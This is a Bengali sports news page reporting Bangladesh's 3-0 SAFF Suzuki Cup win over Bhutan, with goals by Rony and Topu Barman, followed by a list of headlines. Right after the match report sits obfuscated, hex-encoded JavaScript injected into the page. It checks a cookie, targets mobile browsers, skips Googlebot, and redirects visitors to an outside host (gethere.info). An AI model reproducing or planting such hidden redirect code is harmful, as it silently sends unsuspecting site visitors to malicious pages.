for Add

সান্তনার জয় নিয়ে ফিরছে মামুনুলরা

2

বাংলাদেশ ৩ : ০ ভুটান
নিজস্ব প্রতিবেদক : দুই ম্যাচ হেরে সাফ সুজুকি কাপ থেকে বিদায়ের পর বড় ধরনের একটা ঝড় বয়ে গেছে বাংলাদেশ ফুটবল দলের উপর দিয়ে। কোচ মারুফুল হক ঘোষণা দিয়েছেন তিনি আর থাকছেন না জাতীয় দলের সঙ্গে। মামুনুল ইসলামও সাফের পর অধিনায়কত্ব ছাড়ার ঘোষণা দিয়েছেন। সাফ ব্যর্থতার কারণ খুঁজে বের করতে বাফুফে গঠন করেছে তদন্ত কমিটি। দলের আমুল পরিবর্তনেরও সিদ্ধান্ত নিয়েছে দেশের ফুটবলের অভিভাবক সংস্থাটি। ঢাকা এবং কেরালাজুড়ে যখন দলে এমন টালমাটাল অবস্থা ঠিক তখন আজ (সোমবার) বাংলাদেশ দল মাঠে নেমেছিল আনুষ্ঠানিকতার ম্যাচে। প্রতিপক্ষ ভুটান-যাদের বিপক্ষে আগে কখনো হারের রেকর্ড নেই বাংলাদেশের। সেই দলটি হারিয়ে বাংলাদেশ কি পারবে অন্তত সান্তনা নিয়ে ঘরে ফিরতে?-এমন প্রশ্ন ছিল ফুটবলপ্রেমীদের মনে। হ্যা, শেষটা বাংলাদেশ জয়েই করেছে। অপেক্ষাকৃত দূর্বল প্রতিপক্ষকে সহজে হারিয়ে দেশে ফিরছে মামুনুলরা। লাল সবুজ জার্সিধারীরা ৩-০ গোলে হারিয়েছে ভুটানকে। এ জয় বাংলাদেশকে গ্রুপে ঠাঁই দিয়েছে তৃতীয় স্থানে। বেঁচে গেছে চার দলের মধ্যে সবার নিচে থাকার লজ্জ্বা থেকে।
আনুষ্ঠানিকতার এ জয় আক্ষেপই বাড়ালো কেবল। মালদ্বীপের বিপক্ষে ড্রটা করতে পারলেও এ জয়টা তখন গুরুত্বপুর্ন হতে পারতো। সাফ সুজুকি কাপে ‘বি’ গ্রুপ থেকে শেষ চারে যেতে না পারলেও প্রথম দুই ম্যাচে লজ্জাস্কর হারের জ্বালা কিছুটা হলেও জুড়িয়েছে শেষ ম্যাচে। সাখাওয়াত হোসেন রনি জোড়া গোল করেছেন। অন্য গোলটি করেন তপু বর্মণ। বাংলাদেশের পয়েন্ট ৩। আর সমান ম্যাচে ভুটানের কোন পয়েন্ট নেই। ফলে এই সাফ থেকে রিক্ত হস্তেই বিদায় নিতে হলো ‘ড্রাগন বয়েস’ দলকে।
সাফ ফুটবলে বাংলাদেশের এই জয়টা এসেছে পাক্কা ছয় বছর বিশ দিন এবং নয় ম্যাচ পর। সাফ ফুটবলে বাংলাদেশ শেষবার জিতেছিল ২০০৯ সালের ৮ ডিসেম্বর, বঙ্গবন্ধু জাতীয় স্টেডিয়ামে। সেবার গ্রুপ পর্বের ম্যাচে এনামুল হকের জোড়া গোলে বাংলাদেশ ২-১ গোলে হারিয়েছিল শ্রীলঙ্কাকে। এরপর সেমিতে ভারতের কাছে ১-০ গোলে সেই যে পরাভূত হয়, তারপর থেকে ২০১১, ২০১৩ এবং চলমান আসর মিলিয়ে টানা নয় ম্যাচে কাঙ্খিত জয়ের মুখ দেখেনি লাল-সবুজের বাংলাদেশ। অবশেষে ভুটান-বধে মিললো সেই অধরা সাফল্য।
এক যুগ আগে (২০০৩) সর্বশেষ সাফ শিরোপা জিতেছিল বাংলাদেশ। সেই শিরোপা পুনরুদ্ধারের স্বপ্ন খান খান হয়ে যাবার পর বাংলাদেশের লক্ষ্য ছিল ভুটানকে হারিয়ে একমাত্র জয়ের সম্মান নিয়ে কোনমতে দেশে ফেরার। সেটা করতে পেরেছে ভালমতোই। কিন্তু তারপরও ভুটানের বিরুদ্ধে এই স্কোরে জেতাতে মন ভরেনি ফুটবলপ্রেমীদের। কেননা, দশজনের ভুটানের বিরুদ্ধে অন্তত সাত-আট গোলে জেতা উচিত ছিল বলে অভিমত তাদের।
ফিফার র‌্যাঙ্কিংয়ে অবশ্য ভুটানের চেয়ে বাংলাদেশই এগিয়ে। ভুটান ১৮৮, বাংলাদেশ ১৮২। পাঁচ ম্যাচের মুখোমুখিতে বাংলাদেশের জয় চারটি, বাকি ম্যাচটি ড্র। গ্রুপ পর্বে নিজেদের প্রথম ম্যাচে আফগানিস্তানের কাছে ৪-০ এবং দ্বিতীয় ম্যাচে মালদ্বীপের কাছে ৩-১ গোলে হেরে টুর্নামেন্ট থেকে বিদায় নেয় বাংলাদেশ। পক্ষান্তরে নিজেদের প্রথম দুই ম্যাচে ভুটান হারে নেপালের কাছে ৩-১ এবং আফগানিস্তানের কাছে ৩-০ গোলে।
সোমবারের ম্যাচে ৬ মিনিটে ডানপ্রান্ত থেকে রনির পাস বক্সে পেয়েও তা থেকে গোল করতে পারেননি ডিফেন্ডার তপু বর্মণ। ৮ মিনিটে অধিনায়ক মামুনুলের কর্নার থেকে বক্সে বল পেয়ে হেডে লক্ষ্যভেদ করে উল্লাসে মাতেন তপু (১-০)। ১৩ মিনিটে অপর ফরোয়ার্ড নাবিব নেওয়াজ জীবনের শট পোস্টের বাইরের জালে লেগে ফেরত আসে। ১৬ মিনিটে ভুটানের ফরোয়ার্ড চেঞ্চুর শট অল্পের জন্য খুঁজে পায়নি জাল। ২২ মিনিটে ভুটানের বক্সে বল নিয়ে ঢুকে পড়েন মিডফিল্ডার হেমন্ত ভিনসেন্ট বিশ্বাস। কিন্তু পেনাল্টি সীমানায় তাকে অবৈধভাবে বাধা দেন জিগমি দর্জি। ভারতের রেফারি ব্যানার্জী প্রাঞ্জল পেনাল্টির নির্দেশ দেন। আরেক ডিফেন্ডার চিমি দর্জি এই সিদ্ধান্ত মানতে না পেরে ব্যানার্জী প্রাঞ্জলকে ধাক্কা দেন। রেফারি লাল কার্ড দেখিয়ে মাঠ থেকে বের করে দেন চিমিকে। রনি পেনাল্টি শট থেকে গোল করতে ভুল করেননি (২-০)। ৪০ মিনিটে রনির জোরালো শট আটকে দেন নেপালের গোলরক্ষক হরি গুরুং। ৬৬ মিনিটে প্রায় মাঝমাঠ থেকে গতিতে দুই ডিফেন্ডারকে হারিয়ে ভুটানের বক্সে ঢুকে আগুয়ান গোলরক্ষকের পাশ দিয়ে গড়ানো শটে নিজের জোড়া গোল পূর্ণ করেন রনি (৩-০)।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

সব সংবাদ

৪০০তম গ্র্যান্ড স্ল্যাম ম্যাচ জিতে রেকর্ড জোকোভিচের নড়াইলে তারুণ্যের উৎসব চুকবল কর্মসূচি চট্টগ্রামকে হারিয়ে চ্যাম্পিয়ন রাজশাহী হকির সাবেক অধিনায়কের এ কি কান্ড! বিব্রতকর হার নিয়ে রেসলিং ক্যারিয়ারের ইতি টানলেন জন সিনা বিজয় দিবসে বিসিবির প্রীতি ম্যাচে খেলবেন যারা বিএনপির মনোনয়ন পেলেন সাবেক দুই তারকা ফুটবলার ৩০ নভেম্বর কক্সবাজারে বিওএ’র নির্বাচন বর্ণাঢ্য আয়োজনে বিএসপিএর নতুন কার্যালয় উদ্বোধন এশিয়ান আর্চারিতে ভালো করার প্রত্যয় মেসির গোলেও শেষ রক্ষা হলো মিয়ামির ইসলামিক সলিডারিটি গেমসে টিটির লক্ষ্য সেমিফাইনাল ২১তম জাতীয় দূরপাল্লা সাঁতার প্রতিযোগিতা বাংলাদেশের টেস্ট অধিনায়ক থাকছেন শান্ত ইসলামিক সলিডারিটি গেমসে কাঙ্ক্ষিত ফলাফলের প্রত্যাশা বাংলাদেশের নোশিনের শিরোপা অক্ষুন্ন হাসপাতালে ভর্তি মাহমুদউল্লাহ যোগ দিয়েছেন জামাল-জায়ানসহ ১৪ জন, ভারত ম্যাচের ক্যাম্প শুরু নারী হকিতে কোটি টাকার টুর্নামেন্ট থাইল্যান্ডের কাছে হেরে গেল বাংলাদেশের মেয়েরা কাভাকাপ ভলিবলে বাংলাদেশের টানা তৃতীয় জয় আর্টিসান জাতীয় সেপাক টাকরো শুরু কাভাকাপ ভলিবলে বাংলাদেশের দ্বিতীয় জয় সেরা সাঁতারু সামিউল রাফি চট্টগ্রামে কাল জিয়া ফুটবল টুর্নামেন্ট শীর্ষ দাবাড়ুরা খেলবেন ব্লাইন্ডফোল্ড চেস টুর্নামেন্ট আন্তর্জাতিক ভলিবলে মালদ্বীপকে হারিয়ে শুরু বাংলাদেশের জাতীয় সাঁতারে সামিউল রাফির আরেকটি রেকর্ড নরসিংদীতে সব শিক্ষাপ্রতিষ্ঠানের মাঠ খেলার উপযোগী করার নির্দেশ এশিয়ান যুব গেমস কাবাডিতে বাংলাদেশের পদক জয় কাভা আন্তর্জাতিক ভলিবল কাল থেকে শুরু রাফির ৪টি রেকর্ডসহ মোট ৭টি জাতীয় রেকর্ড ২৪ অক্টোবর শুরু হচ্ছে জাতীয় সেপাক টাকরো  জাতীয় সাঁতারে প্রথম দিনে ৫টি নতুন জাতীয় রেকর্ড কিউট-বিএসপিএ স্পোর্টস কার্নিভালে সেরা ক্রীড়াবিদ মুকুল জয় দিয়ে ওয়েস্ট ইন্ডিজ সিরিজ শুরু করতে চায় বাংলাদেশ নভেম্বরে ঢাকায় নারী বিশ্বকাপ কাবাডি আগামী এক বছরে ২৪টি ওয়ানডে খেলবে বাংলাদেশ ব্রাজিলের হয়ে বিশ্বকাপে ইতিহাস গড়তে প্রস্তুত আনচেলত্তি নারী হকিতে ভরসার নাম অর্পিতা পাল বাংলাদেশের মেয়েদের দুবাইয়ে দ্বিতীয় ম্যাচেও সহজ জয় ওয়ার্ল্ড টেনিস ট্যুর জুনিয়র টেনিসে বাংলাদেশের জারিফ চ্যাম্পিয়ন শেষ মুহূর্তের গোলে বাংলাদেশের স্বপ্নভঙ্গ হার দিয়ে ওয়ানডে সিরিজ শুরু বাংলাদেশের হংকংয়ের বিপক্ষে পূর্ণ তিন পয়েন্টের লক্ষ্য ক্যাবরেরার ওয়ার্ল্ড টেনিস ট্যুর জুনিয়র শনিবার থেকে শুরু ৪ বছর পর শুরু হচ্ছে ফেডারেশন কাপ ‘ইনশাআল্লাহ আমরা জিতমু’ : হামজা চৌধুরী লড়াই করে হারল বাংলাদেশ আবারও বিসিবি সভাপতি বুলবুল

For add

For add

গুরুত্বপূর্ণ কিছু লিংক

For add

For add

for Add